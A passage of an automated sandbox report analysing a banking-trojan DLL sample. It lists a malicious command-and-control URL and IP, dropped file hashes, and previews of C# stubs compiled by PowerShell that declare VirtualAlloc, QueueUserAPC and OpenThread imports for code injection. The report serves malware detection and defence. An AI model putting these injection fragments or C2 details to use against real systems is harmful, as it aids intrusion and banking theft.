                      http://crl.micropowershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.189.151.28
                      		unknownSwitzerland
                      		51395AS-SOFTPLUSCHtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620332
                      Start date and time: 04/05/202216:25:582022-05-04 16:25:58 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:xaj0e933Uv.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@25/17@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.9% (good quality ratio 19.1%)
                      • Quality average: 82.2%
                      • Quality standard deviation: 27.1%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.43.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6548 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:27:23API Interceptor1x Sleep call for process: rundll32.exe modified
                      16:28:07API Interceptor36x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):11606
                      Entropy (8bit):4.8910535897909355
                      Encrypted:false
                      SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                      MD5:F84F6C99316F038F964F3A6DB900038F
                      SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                      SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                      SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                      Malicious:false
                      Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1192
                      Entropy (8bit):5.325275554903011
                      Encrypted:false
                      SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                      MD5:05CF074042A017A42C1877FC5DB819AB
                      SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                      SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                      SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                      Malicious:false
                      Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                      C:\Users\user\AppData\Local\Temp\RES5F15.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.9748061757983675
                      Encrypted:false
                      SSDEEP:24:HTe9EuZf4UzDfHUhKdNWI+ycuZhN6xakSl2PNnq9qd:6B4oGKd41ulQa3cq9K
                      MD5:B25228E0D789A80CC458BDEDCA074352
                      SHA1:D02F77745E89EDE624F705B49991653478861CDE
                      SHA-256:AB6DDC0161E42079AAE33ED2D5CCF08861E963F50203059A1B641D41CA9E5951
                      SHA-512:471FF8CBFD71FE1088146FB506BCDC2120CB1515298F68644F898D49205EEA7F198A97AECC990E6438216F0798B785D2B31CBC597AA2180802AA0B0A53491E62
                      Malicious:false
                      Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP................'...4..0...."..b..........4.......C:\Users\user\AppData\Local\Temp\RES5F15.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                      C:\Users\user\AppData\Local\Temp\RES73F5.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.9834931582727697
                      Encrypted:false
                      SSDEEP:24:H5e9EuZfO5XDfH+hKdNWI+ycuZhN9akS7PNnq9qd:wBO5z0Kd41ul9a3xq9K
                      MD5:3216E688A820A84F56F4B051422672D5
                      SHA1:66A45E83433BA569C1539A55EE95B8715BF3CDB9
                      SHA-256:E6B505EA1803ACB819A72DA55DA55A8A45047CB9F64D02682F7B0FB190372B29
                      SHA-512:2598C34B7B84CA677422F49B86FD1D96672987E4D9CA6B4DA2392E336B0B458B914C635D059A3F0CA302B14CC1BDD06ADF374EA095B9051011B42558CAC37297
                      Malicious:false
                      Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP................GgU.V...?.FQ.n...........4.......C:\Users\user\AppData\Local\Temp\RES73F5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgqpx5l1.q4z.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkorezbb.opv.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.1141398576088117
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhN9akS7PNnqX
                      MD5:476755BF56A208B33F9C4651A06EE5A5
                      SHA1:828C47F319540793ABFD06234431820E5594A420
                      SHA-256:EB5CB6796AF4525D3264AC6A5E123A6D682A1C8431FAFC244EAD44DA8046F91C
                      SHA-512:4B7FA176700A57354909997E6F70515F57BB61EBADE429B16262BA5BA8C90755F068EB6AF13954BB3FD39911D27DFAAC6C94A10B90F20CAFA1DE647D84F69C42
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                      C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.283593156851968
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fp1vOBzxs7+AEszIwkn23fp1vOM:p37Lvkmb6KRfBAWZEifB9
                      MD5:9BA74AF8C7DB03DB598E428C80A39C24
                      SHA1:1118FB7E3A74DEDA5A4E7C1C7D1B054CBE5C6E1C
                      SHA-256:29709DDB56A51411468E1EF4A5C98A0CFC749ACB37E58B6BD3574F0F2D302722
                      SHA-512:6B24DA377F68A32BCBD70C00CCCB521CB67A6353A2BD06E7C811A50E67F2BD83F3F79BA9CFCE53747E3F507453EF1E12734BBF9BF3FA413A8827BDA4EB3F66D9
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"

                      C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.600576810696372
                      Encrypted:false
                      SSDEEP:24:etGSa/u2Bg85z7xlfwZD6lgdWqtkZf3rtWI+ycuZhN9akS7PNnq:6fYb5hFCD6wWdJ3rY1ul9a3xq
                      MD5:DB32AF94E50432F083E1DEA228EEF8D4
                      SHA1:7BA5E52289B5D9BBAEB3647F32315FB9AFE0BE9E
                      SHA-256:C91C4DB3E42338BB928B22C4207308E4153D45AEC8F734030CED671F0EAE83BD
                      SHA-512:7AFE704910CF7B27D4D9F756F18B47A159C474B6868378CE68EE105D63AF3E0F5CEEC1DEA5539CFED4DA1E76DA73DA353D16319E63E9F200493486314BDC3C75
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                      C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.346663629193138
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRfDEifeKaM5DqBVKVrdFAMBJTH:Akka6CDEueKxDcVKdBJj
                      MD5:2F9D5A7D317AB29D714CEFE888F56699
                      SHA1:2DE49F06FDE6EAD8ED5886B017B874FAFBCD6356
                      SHA-256:728FA4B4FD272923E395304FA5B40B1F2F98C4D39B88F1BCEDCF81287C9F4EFB
                      SHA-512:6591BE1739BFA8EB5998A6679F865EE3A07363FFA028E0317B73F79ECAEA7675B4BCC16086B425EE74B422898E98874C7C803C5ADB00FD71088CB007A5017069
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.093636689580821
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycxak7Ynqql2PN5Dlq5J:+RI+ycuZhN6xakSl2PNnqX
                      MD5:27A58DEC34A8A930EAF493E122C1D762
                      SHA1:84E4A3CA94FA31FF623DE9EE39782AC021D93B32
                      SHA-256:C9EEA11CDD016DF97932732100DF2AE3F3250F3C49A9270F0BA04F444096B665
                      SHA-512:D267C3F6B444275A3B32A42010F7352D7DC5098A10A5B0A5FAD5D7E0B79F286BD5BC45B9D94BE1A07B65195B9D90CCE58FE4E2F9E93E708C41702CE97F1F3074
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                      C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.182200628670966
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f52wn0zxs7+AEszIwkn23f52sH:p37Lvkmb6KRfh2q0WZEifh2m
                      MD5:8CB0C7CD433BDC2F02299B6932B4A9E3
                      SHA1:00663A78D6DAD361F367FD49A112A56B5C7DFA2B
                      SHA-256:97DB1A8D4B63512E0C57B113E1F95D861B1FBE14D394B9888480BFB2AD6C3F13
                      SHA-512:3072FB0116DB38CBF12CBDBA7D6820DA0C401A7FD7BBB37ACA9564985A3C3F8363D54F0807E06FC2B94D2C9D2B2F94D7E7D74A5B40A1B2C0227CDE522CDBB902
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"

                      C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6207839132053006
                      Encrypted:false
                      SSDEEP:24:etGSo8OmU0t3lm85xWAseO4zxQ64pfUPtkZfi1VUWI+ycuZhN6xakSl2PNnq:6iXQ3r5xNOeQfUuJiT31ulQa3cq
                      MD5:1F0860CDD9E8F6B4501F25728D2131B6
                      SHA1:1126BDC01913B693028ECB663123381889362DA8
                      SHA-256:3CABCC304A4FA671400D71EBEB21F846983224F97AF93BE2CF2AADA6E3B3E34B
                      SHA-512:E8CD254CCF26A063BD36EF34299F7B9C86450E2A2ED9A958E77F05DE1C829470B0EE6129FA00745ED6A0D8DD9379DB384FF7F704BC5820BBC29A30C0A8F4BCA5
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                      C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.307968253776901
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRfPVEif8KaM5DqBVKVrdFAMBJTH:Akka6CPVEu8KxDcVKdBJj
                      MD5:CEA73A1E9F1D1CC3A29CF5AAE996602A
                      SHA1:6BF6258A16B4750D4B37D33FF17D8FF99D11ADC9
                      SHA-256:C232D4309AA78DB4C1FA7E017FA57BFED2E1B05E10090C27DB13BAEB9EE41CC7
                      SHA-512:1125BFEC36CDE86F8C6DAC261F366C90723A22633D78C87C03B4048C45D009E18E7602CD9E22029B388E7B57DF0319143756D33449710CEECC21FEC822ED427A
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\Documents\20220504\PowerShell_transcript.506013.O71O_fmz.20220504162805.txt

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1343
                      Entropy (8bit):5.36590430076155
                      Encrypted:false
                      SSDEEP:24:BxSAI7vBZbx2DOXUWYJobduLCHdV4qWQHjeTKKjX4CIym1ZJXxJobduLCHdV4rN+:BZmvjboO4JobdRdV4tQqDYB1ZDJobdRb
                      MD5:3FD39DAE5C6C053C927C7C421DF22346
                      SHA1:648958C510D633CECD2033A0B76B04A2B8CA6993
                      SHA-256:733ABC0BC0C57B87100F55CA1BB3FDCE133B892BF619D86F1C11A2891C3E844E
